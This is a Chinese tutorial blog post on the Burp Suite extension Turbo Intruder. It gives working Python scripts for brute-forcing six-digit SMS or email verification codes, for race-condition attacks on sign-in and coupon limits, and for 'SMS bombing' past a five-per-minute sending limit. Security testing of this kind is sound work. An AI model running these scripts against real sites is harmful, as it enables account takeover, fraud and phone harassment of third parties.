首页 > 其他分享 >burpsuit插件Turbo Intruder:突破速率限制详解

burpsuit插件Turbo Intruder:突破速率限制详解

时间:2024-03-22 09:22:30浏览次数:28  
标签:engine Turbo 插件 target 验证码 发送 Intruder 请求

一、插件介绍

Turbo Intruder 是一个 Burp Suite 扩展插件,用于发送大量 HTTP 请求并分析结果,可拥抱十亿请求攻击。它旨在处理那些需要异常速度、持续时间或复杂性的攻击来补充Burp Intruder。

二、插件原理

使用第一次请求的时候就建立好连接,后续获取资源都是通过这条连接来获取资源的长连接,它还使用了HTTP 管道(HTTP Pipelining )的方式来发送 请求,这种方式会在等待上一个请求响应的同时,发送下一个请求。而在发送过程中不需要等待服务器对前一个请求的响应;只不过,客户端还是要按照发送请求的顺序来接收响应。通过 HTTP 管道的方式发起请求是短连接(Connection: close )速度的 6000%

三、安装方式

Burp Suite的BApp Store安装Turbo intuder插件


四、使用方式

选中数据包右键选择Send to turbo intruder(这里一定要抓取数据包,没有抓取是不会显示send to  tubo intruder菜单)

此时会打开一个新的窗口,该窗口上半部分区域为原始的HTTP请求包,下半部分为操作代码,中间部分可以根据场景从下拉框中选择具体操作代码。每次打开时此处默认为Last code used,即为上次使用的代码。

其中代码区需要使用“%s”字符来代替需要进行Fuzz的部分。选择对应的操作代码点击最下方Attack即可开始攻击。具体使用细节,可结合第三部分使用场景。


五、使用场景

1.验证码爆破

主要出现在手机验证或者邮箱验证码登录以及密码找回等功能处,验证码爆破需要结合用户名枚举可以实现接管任意用户。

 验证码爆破操作代码:

from itertools import product


def brute_veify_code(target, engine, length):

   pattern = '1234567890'    #用于生成字典的迭代对像

   for i in list(product(pattern, repeat=length)):    #product()接收多个迭代对像,然后生成一个笛卡尔积,repeat参数代表重复迭代对象次数。

        code =  ''.join(i)

        engine.queue(target.req, code)


def queueRequests(target, wordlists):

   engine = RequestEngine(endpoint=target.endpoint,        #指定目标的地址

           concurrentConnections=30,    #与服务器建立30条连接

           requestsPerConnection=100,    #每条连接同时发送100个请求

           pipeline=True    #开启管道(HTTP Pipelining)模式

           )

   brute_veify_code(target, engine, 6)  #根据验证码位数修改


def handleResponse(req, interesting):


 if 'error' not in req.response:    #对response进行操作,不含有“error”的添加入表中

      table.add(req)

演示:

 假设百度wd参数为数字6位验证码。将参数值以“%s”代替,然后将上方代码复制到操作代码区域

点击Attack开始攻击,可以看到"%s"被替换为生成的字典内容。31秒成功请求29431次,RPS为949


2.并发测试

并发漏洞属于业务逻辑漏洞,存在于对次数进行限制的功能点,如签到,抽奖,优惠券领取等功能点。使用并发技术进行测试,观察服务器是否可以多次成功响应。

并发测试的操作代码:

def queueRequests(target, wordlists):

    engine = RequestEngine(endpoint=target.endpoint,

                           concurrentConnections=30,

                           requestsPerConnection=100,

                           pipeline=False

                           )


    for i in range(30):        #创建30个请求,需要和concurrentConnections对应,每条连接发送一个请求

        engine.queue(target.req, target.baseInput, gate='race1')    #“gate”参数会阻塞每个请求的最后一个字节,直到调用openGate

#等待,直到每个“race1”标记的请求就绪,然后发送每个请求的最后一个字节

    engine.openGate('race1')    #标识属于同一个并发测试的请求

    engine.complete(timeout=60)


def handleResponse(req, interesting):

    table.add(req)

 演示:

此代码在插件中可选/examples/race.py

由于并发测试不需要对原始请求包进行处理,所以很可能会遇到下面这种问题由于工具执行流程,在原始请求包里必须有"%s"字段,因此需要在请求包中任意位置添加“%s”即可。

3.短信轰炸

在某个网站上发现了用户注册页面中有一个获取验证码
image.png
抓一下发送验证码的数据包我们看到手机号在POST参数中,把这个数据包发到Turbo Intruder
记得在请求头加一个X: %s(turbo中的%s类似于burp intruder里面的§s§,虽然我们没有迭代的变量,但是turbo启动时会检查%s)

此代码在插件中可选/examples/race.py

并发发送数据包,可以看到发送结果大部分的长度都为328328就是发送成功通过该插件可以绕过一分钟只发送5次短信的限制,并发在短时间内1秒发送10次验证码。

标签:engine,Turbo,插件,target,验证码,发送,Intruder,请求
From: https://www.cnblogs.com/backlion/p/18088702

相关文章

  • 移动端 页面适配 原生js及lib-flexible 插件
    1.js原生;(function(win,doc){change()functionchange(){varremSize=window.innerWidth/7.5||50/*设计稿是以width=750px为基准的*/document.querySelector('html').style.fontSize=(remSize>100?100:remSize)+'px'}......
  • 插件-js实现动态时钟效果
    <divid="updatetime"></div>constupdateTime=()=>{varnow=newDate();varyear=now.getFullYear();varmonth=now.getMonth()+1;//getMonth()返回0-11varday=now.getDate();varhours=now.getHour......
  • 用户界面插件
    用户界面插件使用用户界面插件,可以将附加功能添加到StableDiffusionUI的用户界面中。注意:插件尚未经过恶意代码审查。请仅使用您信任的插件。安装插件如果插件描述中没有另外说明,请右键单击插件链接并将插件保存到C:\EasyDiffusion\plugins\ui(或分别安装到的驱动器)。文件......
  • 魔兽世界LUA插件开发与示例
    魔兽世界LUA插件开发1.创建插件1.1创建插件文件夹打开WorldofWarcraft\Interface\AddOns文件下,在该文件夹下创建一个插件名文件夹用来存放插件,如Makubex1.2创建插件文件在该文件夹下创建俩个文件,一个是用来给魔兽世界引入的toc头文件,一个是你自己的lua脚本文......
  • vue项目中使用html2canvas插件
    一、生成海报图vue项目中使用html2canvas插件,实现将编写的html代码转成可以保存的图片,只需要以下四步。1、在vue项目中安装插件npmihtml2canvas 2、在需要使用到的页面引入html2canvas插件importhtml2canvasfrom“html2canvas”; 3、按照设计图编写html代码<d......
  • chrome拓展-chrome插件-强制copy
    方法:浏览器扩展最简单也是最省事的方法,直接安装解除复制限制的扩展完事儿。下面推荐两款扩展:SimpleAllowCopy:Chrome&Edge(Chromium系的应该都可以)AbsoluteEnableRightClick&Copy:Chrome&Edge&Firefox使用方法也很简单,在有复制限制或者右键限制的网站上,点击扩展......
  • VsCode中高效书写Vue3代码的插件
    Vue-Official(原Volar)就是原先的Volar,现已弃用。Vue-Official提供的功能:语法高亮:Vue-Official扩展可以为Vue单文件组件(.vue文件)中的HTML、CSS和JavaScript部分提供语法高亮,使代码更易于阅读和编写。代码片段:Vue-Official扩展提供了丰富的Vue.js相关的......
  • 得嘞,分页插件PageHelper返回记录总数total竟然出错了!
    问题描述分页返回的记录总数total和每页数量pageSize一致,数据库统计的数量大于当前返回的总记录数total,以下是相关代码问题分析sql错误导致返回信息有误?检查结果:经过数据执行日志中生成的sql,sql正常并且数据总条数也正确PageHelper使用方式错误,导致数据错误检查结果:通过与......
  • Photoshop2024(PS)和Lightroom(LR)设计的智能磨皮插件Portraiture下载
     打造完美肤质,PortraiturePS/LR专用智能磨皮插件让你的照片焕发魅力副标题:让你的照片告别粗糙皮肤和毛孔,展现自然细腻的肤质在摄影后期处理中,给照片进行磨皮和肤质优化是一项必不可少的步骤。而今天,我们为你带来了一款专为Photoshop(PS)和Lightroom(LR)设计的智能磨皮插件——......
  • 打造专业人像照片的必备神器Portraiture2024免费PS/LR专用智能磨皮插件
    在摄影后期处理中,人像照片的磨皮处理是一项必不可少的技能。今天,我们为大家带来了一款专为Photoshop(PS)和Lightroom(LR)设计的智能磨皮插件——Portraiture。这款插件凭借其出色的表现和便捷的操作,深受广大摄影爱好者和专业摄影师的喜爱。接下来,让我们一起探索Portraiture的魅力......